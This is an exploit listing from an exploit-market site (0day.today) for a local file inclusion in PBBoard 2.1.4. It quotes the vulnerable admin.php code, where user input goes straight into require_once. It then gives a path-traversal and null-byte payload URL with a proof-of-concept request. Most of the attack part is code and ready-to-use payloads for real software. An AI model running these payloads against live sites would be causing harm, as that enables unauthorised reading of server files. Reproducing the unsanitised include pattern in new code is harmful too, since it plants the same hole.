[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PBBoard 2.1.4 Local File Inclusion

Author
n4ss1m
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-18380
Category
web applications
Date add
25-05-2012
Platform
php
################################################################################################
# Exploit Title: PBBoard 2.1.4 Local File Inclusion
# Software Link: http://www.pbboard.com/PBBoard_v2.1.4.zip
# Author: n4ss1m
# Date: 25-05-2012
# Tested on: win/linux
# Home : www.Sec4ever.com
################################################################################################
# Exploit-DB note:
# Need to be logged in, at the very least, as
# a standard user to trigger this vulnerability
#
 
# Local File Inclusion ( admin.php )
 
<?php
    define('IN_PowerBB',true);
    $page = empty($_GET['page']) ? 'index' : $_GET['page']; # $page ==>
$_GET['page']
    $page = str_replace( 'note', 'notes', $page );
    $page = str_replace( 'index', 'main', $page );
    $module = ('modules/admin/'.$page.'.module.php'); # $module ==>
'modules/admin/'.$page.'.module.php'
    if (!file_exists($module))
    {
        ....
    }
    require_once($module); # Ops ! LFI
    //////////
    $class_name = CLASS_NAME;
    $class_name = new $class_name;
    $class_name->run();
?>
 
# Explotion
http://domain.tld/admin.php?page=../../[FILENAME][Nullbyte]
 
# PoC :
http://domain.tld/admin.php?page=../../robots.txt%00



#  0day.today [2024-06-27]  #